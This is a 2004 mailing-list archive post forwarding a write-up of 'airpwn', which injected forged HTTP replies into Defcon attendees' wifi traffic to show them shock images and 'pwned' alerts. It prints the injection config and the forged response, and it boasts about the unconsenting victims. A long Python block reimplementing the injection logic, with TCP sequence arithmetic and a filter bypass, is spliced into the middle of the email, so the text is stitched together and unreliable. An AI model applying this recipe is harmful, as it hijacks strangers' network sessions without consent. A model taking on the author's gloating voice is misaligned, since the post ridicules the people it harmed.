OT (sortof) security related for all u wifi people

From: Shortpier <shortpier@shortpier.is-a-geek.com>
Date: Fri Aug 06 2004 - 23:36:08 AKDT

If I was not a nice person............
Look out coffee shops..............
http://www.evilscheme.org/defcon/

-- HTML Attachment decoded to text by Ecartis --
-- File: www.evilscheme.org/defcon/

 Goatse at Defcon -- brought to you by airpwn

airpwn - bringing goatse (and friends) to Defcon 12!

Images from Dave's camera[1]
Movies from Dave's camera[2]
Images from my phone[3]

At Defcon 12 this year my cow-orkers and I brought along a little piece of
code called "airpwn." Airpwn is a platform for injection of application
layer data on an 802.11b network. Although the potential for evil is very
high with this tool, we decided to demonstrate it (and give it its first real
field trial) on something nasty, but harmless (compared to say, wiping your
hard-drive).

Over the course of defcon, we fielded 7 different airpwn configurations to
see how well it worked, and of course to watch as 31337 h4x0rz got goatse up
in their mug. The configurations were:
  * HTTP goatse, 100% of the screen
  * HTTP goatse replacing all images
  * HTTP goatse as the page background via CSS
  * HTTP tubgirl replacing all images
  * HTTP "owned" graphic, replacing all images (eventually I felt bad
    about all the ass pictures)
  * HTTP javascript alert boxes, letting people know just how pwned they
    were
  * FTP banners (while this worked, nobody pays attention to FTP banners
    so we abandoned this quickly)

How does it work?

airpwn requires two 802.11b interfaces, one for listening, and another for
injecting. It uses a config file with multiple config sections to respond to
specific data packets with arbitrary content. For example, in the HTML
goatse example, we look for any TCP data packets starting with "GET" or
"POST" and respond with a valid server response including a reference to the
canonical goatse image. Here's the configuration file used for this mode:

    begin goatse_html
    match ^(GET|POST)
    ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tif|tiff)
    response content/goatse_html

and here is the content that we return when the match is triggered:

    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html

    <html><head><title>pwned</title></head><body><h1>OPEN YOUR MIND -- TO THE
    ANUS!!</h1><img src='http://goat.cx/hello.jpg' width='100%' height='100%'>

Each of the 7 modes mentioned previously varied in the configuration and
content returned. In each case the poor user of the web browser was left
feeling disgusted, afraid and/or confused. While I was busy operating airpwn
at the laptop, my accomplices wandered the show-floor taking pictures and
the occasional video of our victims. Links to our victims are at the top of
the page.
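The following is an added, offline model of the config logic described above (it is not code from the airpwn project, which ships its own parser): it reads a begin/match/ignore/response section in the same shape as the goatse_html config, applies the match and ignore regexes to a sniffed TCP payload, and returns the canned reply that would be injected. The section grammar, the "#" comment handling, the in-memory stand-in for the content/goatse_html file and the spoofed_tcp_numbers helper are assumptions for illustration; the helper states the general TCP sequence arithmetic a forged server segment needs, not a claim about airpwn's internals. It also goes one step beyond the page by showing that an image fetched through a query string (a "?" in the path) slips past the ignore rule and gets the HTML reply anyway.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed copy of the goatse_html section quoted on the page.
AIRPWN_CONF = """
# airpwn-style section (comment syntax assumed for this example)
begin goatse_html
match ^(GET|POST)
ignore ^GET [^ ?]+\\.(jpg|jpeg|gif|png|tif|tiff)
response content/goatse_html
"""

# Constructed stand-in for the content/goatse_html file; the real one is
# the HTTP response shown on the page.
CONTENT_FILES = {
    "content/goatse_html": (
        "HTTP/1.1 200 OK\r\n"
        "Connection: close\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><head><title>pwned</title></head><body>"
        "<img src='http://goat.cx/hello.jpg' width='100%' height='100%'>"
    ),
}


@dataclass
class Section:
    name: str
    match: Optional[re.Pattern] = None
    ignore: Optional[re.Pattern] = None
    response: Optional[str] = None


def parse_conf(text: str) -> list[Section]:
    """Parse begin/match/ignore/response directives (assumed grammar)."""
    sections: list[Section] = []
    cur: Optional[Section] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, val = line.partition(" ")
        if key == "begin":
            cur = Section(name=val)
            sections.append(cur)
        elif cur is None:
            raise ValueError(f"{key!r} directive before any 'begin'")
        elif key == "match":
            cur.match = re.compile(val.encode())   # payloads are bytes
        elif key == "ignore":
            cur.ignore = re.compile(val.encode())
        elif key == "response":
            cur.response = val
        else:
            raise ValueError(f"unknown directive {key!r}")
    return sections


def select_response(sections: list[Section], payload: bytes) -> Optional[bytes]:
    """Return the reply to inject for a sniffed TCP payload, or None.

    The first section whose 'match' hits and whose 'ignore' does not wins,
    so the image GETs excluded by 'ignore' are left alone and the goatse
    image itself can still load.
    """
    for s in sections:
        if s.match is None or not s.match.search(payload):
            continue
        if s.ignore is not None and s.ignore.search(payload):
            continue
        return CONTENT_FILES[s.response].encode()
    return None


def spoofed_tcp_numbers(client_seq: int, client_ack: int, payload_len: int) -> dict:
    """Sequence numbers a forged server->client segment must carry so the
    client's TCP stack accepts it ahead of the real reply: seq is what the
    client expects next (its ACK), ack covers the request bytes it just sent.
    General TCP injection arithmetic, assumed here rather than taken from airpwn.
    """
    return {"seq": client_ack, "ack": (client_seq + payload_len) & 0xFFFFFFFF}


if __name__ == "__main__":
    secs = parse_conf(AIRPWN_CONF)
    for req in (b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
                b"GET /logo.png HTTP/1.1\r\n",
                b"GET /img.php?f=a.jpg HTTP/1.1\r\n",
                b"HEAD / HTTP/1.1\r\n"):
        reply = select_response(secs, req)
        print(req.split(b"\r\n")[0], "->", "inject" if reply else "leave alone")
```

Run it as a script to see which constructed requests get the spoofed reply; the /logo.png fetch is skipped by the ignore rule, the /img.php?f=a.jpg fetch is not, because `[^ ?]+` stops at the question mark before it can reach the `.jpg`.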

In all honesty, the reaction to airpwn wasn't exactly what I had expected.
When I was writing the code, I imagined that the second I turned airpwn on
we'd hear immediate groans of disgust radiating out at the speed of light.
In practice, airpwn's effect was simultaneously more private, and more full
of personal drama. First off, the full-screen goatse seemed to be too
powerful. The second it flashed on the screen, the savvy user would have the
browser closed already. This made it incredibly difficult to actually catch
the victims on film. Based on the logs generated by airpwn we would be
hitting multiple people per second, but finding someone with goatse up on
their screen was still a bit of a challenge.. Once we did find a victim,
the results were pretty hilarious.. I had tears rolling down my cheeks on
multiple occasions. The typical goatse reaction went something like this:
  * Open browser, see goatse, jump backwards a little
  * quickly close browser, take a breath
  * open browser, see goatse, close browser (faster this time)
  * scratch head, quit browser process, re-launch browser
  * see page indicating that goatse will load soon (page header, etc.)
    immediately close browser.
  * open up browser preferences, click all the tabs, look for the "no
    goatse" checkbox
  * clear the browser cache
  * open browser, see goatse, close browser
  * open network preferences, click on all the tabs, look for the "no
    goatse" checkbox.
  * disconnect from network, re-associate
  * open browser, see goatse, close browser
At this point, the less l33t people would generally give up and either 1) do
something else or 2) look deep into goatse's anus with a 10-yard stare[4]..
The more l33t victims would launch ethereal and try to figure out what was
going on.. Eventually they would mumble something about "rogue APs" (WRONG!)
or ARP poisoning (WRONG!) or DNS poisoning (WRONG!) and do something else..

After a few hours, it quickly became apparent that the image replacement
mode was the only mode that would be sustainable for long periods of time. The
full-screen goatse amounted to a complete DoS of HTTP, which was just plain
rude. The javascript injection (with dialog boxes talking about the victim
being pwned) was by far the most disruptive. Most people (quite sanely)
immediately turned off their laptops or whipped out ethereal in full
COUNTERHACK mode. The goatse image mode was disruptive enough to be fully
fucking hilarious, yet still left HTTP enough alone to be usable. I guess
image-maps were the only things we truly broke with that mode (hint: click
the anus!)

Overall, airpwn was just about the only reason why defcon was amusing this
year.. Without airpwn I think I would have been mostly asleep and would have
just IRCed the entire time.. If you want to play with airpwn yourself, an
early alpha has been posted to sourceforge[5]..

-toast

--- Links ---
   1 dave_images
   2 dave_video
   3 bryan_phoneimages
   4 dave_video/What do I do now.AVI
   5 http://sf.net/projects/airpwn

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
Received on Fri Aug 6 23:34:26 2004

This archive was generated by hypermail 2.1.8 : Fri Aug 06 2004 - 23:34:28 AKDT